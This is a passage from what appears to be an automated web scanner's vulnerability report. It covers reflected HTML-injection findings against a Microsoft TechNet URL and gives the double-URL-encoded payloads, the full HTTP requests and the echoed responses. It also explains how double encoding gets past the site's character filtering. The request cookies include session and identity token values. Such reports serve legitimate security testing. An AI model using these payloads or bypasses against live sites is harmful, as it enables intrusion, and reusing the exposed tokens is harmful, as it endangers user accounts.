msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:22:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usd7b79"><a>6e48a9d51bc/library/bb727024" />
...[SNIP]...

2.164. http://technet.microsoft.com/en-us/library/bb727024.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/bb727024.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d263%2522%253e%253ca%253eefc03635f13 was submitted in the REST URL parameter 2. This input was echoed as 2d263"><a>efc03635f13 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library2d263%2522%253e%253ca%253eefc03635f13/bb727024.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; 
__qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:22:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library2d263"><a>efc03635f13/bb727024" />
...[SNIP]...

2.165. http://technet.microsoft.com/en-us/library/bb727024.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/bb727024.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c816%2522%253e%253ca%253ed902524dd17 was submitted in the REST URL parameter 3. This input was echoed as 1c816"><a>d902524dd17 in the application's response.

This be